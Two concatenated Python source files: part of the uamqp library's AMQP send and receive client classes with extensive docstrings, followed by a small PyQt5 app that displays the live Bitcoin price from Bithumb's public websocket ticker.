- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
- uamqp.authentication.JWTTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param msg_timeout: A timeout in milliseconds for messages from when they have been
added to the send queue to when the message is actually sent. This prevents potentially
expired data from being sent. If set to 0, messages will not expire. Default is 0.
:type msg_timeout: int
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
To create a desired_capabilities object, please do as follows:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param link_credit: The sender Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
:type link_credit: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
error_policy=None, keep_alive_interval=None, **kwargs):
target = target if isinstance(target, address.Address) else address.Target(target)
self._msg_timeout = msg_timeout
self._pending_messages = []
self._waiting_messages = []
self._shutdown = None
# Sender and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._link_properties = kwargs.pop('link_properties', None)
self._link_credit = kwargs.pop('link_credit', None)
# AMQP object settings
self.sender_type = sender.MessageSender
super(SendClient, self).__init__(
target,
auth=auth,
client_name=client_name,
debug=debug,
error_policy=error_policy,
keep_alive_interval=keep_alive_interval,
**kwargs)
def _client_ready(self):
"""Determine whether the client is ready to start sending messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageSender must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageSender
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.sender_type(
self._session, self._name, self._remote_address,
name='sender-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
send_settle_mode=self._send_settle_mode,
receive_settle_mode=self._receive_settle_mode,
max_message_size=self._max_message_size,
link_credit=self._link_credit,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageSenderState.Error:
raise errors.MessageHandlerError(
"Message Sender Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageSenderState.Open:
return False
return True
def _on_message_sent(self, message, result, delivery_state=None):
"""Callback run on a message send operation. If message
has a user defined callback, it will be called here. If the result
of the operation is failure, the message state will be reverted
to 'pending' up to the maximum retry count.
:param message: The message that was sent.
:type message: ~uamqp.message.Message
:param result: The result of the send operation.
:type result: int
:param error: An Exception if an error ocurred during the send operation.
:type error: ~Exception
"""
# pylint: disable=protected-access
try:
exception = delivery_state
result = constants.MessageSendResult(result)
if result == constants.MessageSendResult.Error:
if isinstance(delivery_state, Exception):
exception = errors.ClientMessageError(delivery_state, info=delivery_state)
exception.action = errors.ErrorAction(retry=True)
elif delivery_state:
error = errors.ErrorResponse(delivery_state)
exception = errors._process_send_error(
self._error_policy,
error.condition,
error.description,
error.info)
else:
exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
exception.action = errors.ErrorAction(retry=True)
if exception.action.retry == errors.ErrorAction.retry \
and message.retries < self._error_policy.max_retries:
if exception.action.increment_retries:
message.retries += 1
self._backoff = exception.action.backoff
_logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
message.state = constants.MessageState.WaitingToBeSent
return
if exception.action.retry == errors.ErrorAction.retry:
_logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
else:
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
elif result == constants.MessageSendResult.Timeout:
exception = compat.TimeoutException("Message send timed out.")
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
else:
_logger.debug("Message sent: %r, %r", result, exception)
message.state = constants.MessageState.SendComplete
message._response = errors.MessageAlreadySettled()
if message.on_send_complete:
message.on_send_complete(result, exception)
except KeyboardInterrupt:
_logger.error("Received shutdown signal while processing message send completion.")
self.message_handler._error = errors.AMQPClientShutdown()
def _get_msg_timeout(self, message):
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - message.idle_time)
if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
return None
return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0
def _transfer_message(self, message, timeout):
sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
if not sent:
_logger.info("Message not sent, raising RuntimeError.")
raise RuntimeError("Message sender failed to add message data to outgoing queue.")
def _filter_pending(self):
filtered = []
for message in self._pending_messages:
if message.state in constants.DONE_STATES:
continue
elif message.state == constants.MessageState.WaitingForSendAck:
self._waiting_messages += 1
elif message.state == constants.MessageState.WaitingToBeSent:
message.state = constants.MessageState.WaitingForSendAck
try:
timeout = self._get_msg_timeout(message)
if timeout is None:
self._on_message_sent(message, constants.MessageSendResult.Timeout)
if message.state != constants.MessageState.WaitingToBeSent:
continue
else:
self._transfer_message(message, timeout)
except Exception as exp: # pylint: disable=broad-except
self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
if message.state != constants.MessageState.WaitingToBeSent:
continue
filtered.append(message)
return filtered
def _client_run(self):
"""MessageSender Link is now open - perform message send
on all pending messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
# pylint: disable=protected-access
self.message_handler.work()
self._connection.work()
if self._connection._state == c_uamqp.ConnectionState.DISCARDING:
raise errors.ConnectionClose(constants.ErrorCodes.InternalServerError)
self._waiting_messages = 0
self._pending_messages = self._filter_pending()
if self._backoff and not self._waiting_messages:
_logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
self._connection.sleep(self._backoff)
self._backoff = 0
return True
@property
def _message_sender(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
@property
def pending_messages(self):
return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._pending_messages = []
self._remote_address = address.Target(redirect.address)
self._redirect(redirect, auth)
def queue_message(self, *messages):
"""Add one or more messages to the send queue.
No further action will be taken until either `SendClient.wait()`
or `SendClient.send_all_messages()` has been called.
The client does not need to be open yet for messages to be added
to the queue. Multiple messages can be queued at once:
- `send_client.queue_message(my_message)`
- `send_client.queue_message(message_1, message_2, message_3)`
- `send_client.queue_message(*my_message_list)`
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
"""
for message in messages:
for internal_message in message.gather():
internal_message.idle_time = self._counter.get_current_ms()
internal_message.state = constants.MessageState.WaitingToBeSent
self._pending_messages.append(internal_message)
def send_message(self, messages, close_on_done=False):
"""Send a single message or batched message.
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
:param close_on_done: Close the client once the message is sent. Default is `False`.
:type close_on_done: bool
:raises: ~uamqp.errors.MessageException if message fails to send after retry policy
is exhausted.
"""
batch = messages.gather()
pending_batch = []
for message in batch:
message.idle_time = self._counter.get_current_ms()
self._pending_messages.append(message)
pending_batch.append(message)
self.open()
running = True
try:
while running and any([m for m in pending_batch if m.state not in constants.DONE_STATES]):
running = self.do_work()
failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
if any(failed):
details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
details['failed_messages'] = {}
exception = None
for failed_message in failed:
exception = failed_message._response # pylint: disable=protected-access
details['failed_messages'][failed_message] = exception
raise errors.ClientMessageError(exception, info=details)
finally:
if close_on_done or not running:
self.close()
def messages_pending(self):
"""Check whether the client is holding any unsent
messages in the queue.
:rtype: bool
"""
return bool(self._pending_messages)
def wait(self):
"""Run the client until all pending message in the queue
have been processed. Returns whether the client is still running after the
messages have been processed, or whether a shutdown has been initiated.
:rtype: bool
"""
running = True
while running and self.messages_pending():
running = self.do_work()
return running
def send_all_messages(self, close_on_done=True):
"""Send all pending messages in the queue. This will return a list
of the send result of all the pending messages so it can be
determined if any messages failed to send.
This function will open the client if it is not already open.
:param close_on_done: Close the client once the messages are sent.
Default is `True`.
:type close_on_done: bool
:rtype: list[~uamqp.constants.MessageState]
"""
self.open()
running = True
try:
messages = self._pending_messages[:]
running = self.wait()
results = [m.state for m in messages]
return results
finally:
if close_on_done or not running:
self.close()
class ReceiveClient(AMQPClient):
"""An AMQP client for receiving messages.
:param target: The source AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Source object.
:type target: str, bytes or ~uamqp.address.Source
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
- uamqp.authentication.JWTTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param timeout: A timeout in milliseconds. The receiver will shut down if no
new messages are received after the specified timeout. If set to 0, the receiver
will never timeout and will continue to listen. The default is 0.
Set `shutdown_after_timeout` to `False` if keeping the receiver open after timeout is needed.
:type timeout: float
:param shutdown_after_timeout: Whether to automatically shutdown the receiver
if no new messages are received after the specified timeout. Default is `True`.
:type shutdown_after_timeout: bool
:param auto_complete: Whether to automatically settle message received via callback
or via iterator. If the message has not been explicitly settled after processing
the message will be accepted. Alternatively, when used with batch receive, this setting
will determine whether the messages are pre-emptively settled during batching, or otherwise
let to the user to be explicitly settled.
:type auto_complete: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
To create a desired_capabilities object, please do as follows:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param prefetch: The receiver Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
The default is 300.
:type prefetch: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, source, auth=None, client_name=None, debug=False, timeout=0,
auto_complete=True, error_policy=None, **kwargs):
source = source if isinstance(source, address.Address) else address.Source(source)
self._timeout = timeout
self._last_activity_timestamp = None
self._was_message_received = False
self._message_received_callback = None
self._streaming_receive = False
self._received_messages = compat.queue.Queue()
self._shutdown_after_timeout = kwargs.pop('shutdown_after_timeout', True)
self._timeout_reached = False
# Receiver and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._prefetch = kwargs.pop('prefetch', None) or 300
self._link_properties = kwargs.pop('link_properties', None)
# AMQP object settings
self.receiver_type = receiver.MessageReceiver
self.auto_complete = auto_complete
super(ReceiveClient, self).__init__(
source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)
@property
def _message_receiver(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
def _client_ready(self):
"""Determine whether the client is ready to start receiving messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageReceiver must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.receiver_type(
self._session, self._remote_address, self._name,
on_message_received=self._message_received,
name='receiver-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
receive_settle_mode=self._receive_settle_mode,
send_settle_mode=self._send_settle_mode,
prefetch=0, # set to 0 as not to receive messages during connection establishment, set prefetch later
max_message_size=self._max_message_size,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageReceiverState.Error:
raise errors.MessageHandlerError(
"Message Receiver Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageReceiverState.Open:
self._last_activity_timestamp = self._counter.get_current_ms()
return False
# once the receiver client is ready/connection established, we set prefetch as per the config
self.message_handler._link.set_prefetch_count(self._prefetch) # pylint: disable=protected-access
return True
def _client_run(self):
"""MessageReceiver Link is now open - start receiving messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
self.message_handler.work()
self._connection.work()
now = self._counter.get_current_ms()
if self._last_activity_timestamp and not self._was_message_received:
# If no messages are coming through, back off a little to keep CPU use low.
time.sleep(0.05)
if self._timeout > 0:
timespan = now - self._last_activity_timestamp
if timespan >= self._timeout:
self._timeout_reached = True
if self._shutdown_after_timeout:
_logger.info("Timeout reached, closing receiver.")
self._shutdown = True
else:
self._last_activity_timestamp = None # To reuse the receiver, reset the timestamp
_logger.info("Timeout reached, keeping receiver open.")
else:
self._last_activity_timestamp = now
self._was_message_received = False
return True
def _complete_message(self, message, auto): # pylint: disable=no-self-use
if not message or not auto:
return
message.accept()
def _message_generator(self):
"""Iterate over processed messages in the receive queue.
:rtype: generator[~uamqp.message.Message]
"""
self.open()
auto_complete = self.auto_complete
self.auto_complete = False
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
message = None
try:
while receiving and not self._timeout_reached:
while receiving and self._received_messages.empty() and not self._timeout_reached:
receiving = self.do_work()
while not self._received_messages.empty():
message = self._received_messages.get()
self._received_messages.task_done()
yield message
self._complete_message(message, auto_complete)
finally:
self._complete_message(message, auto_complete)
self.auto_complete = auto_complete
if self._shutdown_after_timeout:
self.close()
def _message_received(self, message):
"""Callback run on receipt of every message. If there is
a user-defined callback, this will be called.
Additionally if the client is retrieving messages for a batch
or iterator, the message will be added to an internal queue.
:param message: Received message.
:type message: ~uamqp.message.Message
"""
self._was_message_received = True
if self._message_received_callback:
self._message_received_callback(message)
self._complete_message(message, self.auto_complete)
if not self._streaming_receive:
self._received_messages.put(message)
elif not message.settled:
# Message was received with callback processing and wasn't settled.
_logger.info("Message was not settled.")
def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
"""Receive a batch of messages. Messages returned in the batch have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback. This method will return as soon as some messages are
available rather than waiting to achieve a specific batch size, and therefore the
number of messages returned per call will vary up to the maximum allowed.
If the receive client is configured with `auto_complete=True` then the messages received
in the batch returned by this function will already be settled. Alternatively, if
`auto_complete=False`, then each message will need to be explicitly settled before
it expires and is released.
:param max_batch_size: The maximum number of messages that can be returned in
one call. This value cannot be larger than the prefetch value, and if not specified,
the prefetch value will be used.
:type max_batch_size: int
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
:param timeout: I timeout in milliseconds for which to wait to receive any messages.
If no messages are received in this time, an empty list will be returned. If set to
0, the client will continue to wait until at least one message is received. The
default is 0.
:type timeout: float
"""
self._message_received_callback = on_message_received
max_batch_size = max_batch_size or self._prefetch
if max_batch_size > self._prefetch:
raise ValueError(
'Maximum batch size cannot be greater than the '
'connection link credit: {}'.format(self._prefetch))
timeout = self._counter.get_current_ms() + timeout if timeout else 0
expired = False
self.open()
receiving = True
batch = []
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
if len(batch) >= max_batch_size:
return batch
self._timeout_reached = False
self._last_activity_timestamp = None
while receiving and not expired and len(batch) < max_batch_size and not self._timeout_reached:
while receiving and self._received_messages.qsize() < max_batch_size and not self._timeout_reached:
if timeout and self._counter.get_current_ms() > timeout:
expired = True
break
before = self._received_messages.qsize()
receiving = self.do_work()
received = self._received_messages.qsize() - before
if self._received_messages.qsize() > 0 and received == 0:
# No new messages arrived, but we have some - so return what we have.
expired = True
break
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
return batch
def receive_messages(self, on_message_received):
"""Receive messages. This function will run indefinitely, until the client
closes either via timeout, error or forced interruption (e.g. keyboard interrupt).
If the receive client is configured with `auto_complete=True` then the messages that
have not been settled on completion of the provided callback will automatically be
accepted provided it has not expired. If an error occurs or the message has expired
it will be released. Alternatively if `auto_complete=False`, each message will need
to be explicitly settled during the callback, otherwise it will be released.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._streaming_receive = True
self.open()
self._message_received_callback = on_message_received
self._timeout_reached = False
self._last_activity_timestamp = None
receiving = True
try:
while receiving and not self._timeout_reached:
receiving = self.do_work()
receiving = False
except:
receiving = False
raise
finally:
self._streaming_receive = False
if not receiving and self._shutdown_after_timeout:
self.close()
def receive_messages_iter(self, on_message_received=None):
"""Receive messages by generator. Messages returned in the generator have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._message_received_callback = on_message_received
return self._message_generator()
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = False
self._last_activity_timestamp = None
self._was_message_received = False
self._received_messages = compat.queue.Queue()
self._remote_address = address.Source(redirect.address)
self._redirect(redirect, auth)
|
09_10.py | import multiprocessing as mp
import websockets
import asyncio
import json
import sys
import datetime
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
async def bithumb_ws_client(q):
uri = "wss://pubwss.bithumb.com/pub/ws"
async with websockets.connect(uri, ping_interval=None) as websocket:
subscribe_fmt = {
"type":"ticker",
"symbols": ["BTC_KRW"],
"tickTypes": ["1H"]
}
subscribe_data = json.dumps(subscribe_fmt)
await websocket.send(subscribe_data)
while True:
data = await websocket.recv()
data = json.loads(data)
q.put(data)
async def main(q):
await bithumb_ws_client(q)
def producer(q):
asyncio.run(main(q))
class Consumer(QThread):
poped = pyqtSignal(dict)
def __init__(self, q):
super().__init__()
self.q = q
def run(self):
while True:
if not self.q.empty():
data = q.get()
self.poped.emit(data)
class MyWindow(QMainWindow):
def __init__(self, q):
super().__init__()
self.setGeometry(200, 200, 400, 200)
self.setWindowTitle("Bithumb Websocket with PyQt")
# thread for data consumer
self.consumer = Consumer(q)
self.consumer.poped.connect(self.print_data)
self.consumer.start()
# widget
self.label = QLabel("Bitcoin: ", self)
self.label.move(10, 10)
# QLineEdit
self.line_edit = QLineEdit(" ", self)
self.line_edit.resize(150, 30)
self.line_edit.move(100, 10)
@pyqtSlot(dict)
def print_data(self, data):
content = data.get('content')
if content is not None:
current_price = int(content.get('closePrice'))
self.line_edit.setText(format(current_price, ",d"))
now = datetime.datetime.now()
self.statusBar().showMessage(str(now))
if __name__ == "__main__":
q = mp.Queue()
p = mp.Process(name="Producer", target=producer, args=(q,), daemon=True)
p.start()
# Main process
app = QApplication(sys.argv)
mywindow = MyWindow(q)
mywindow.show()
app.exec_() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.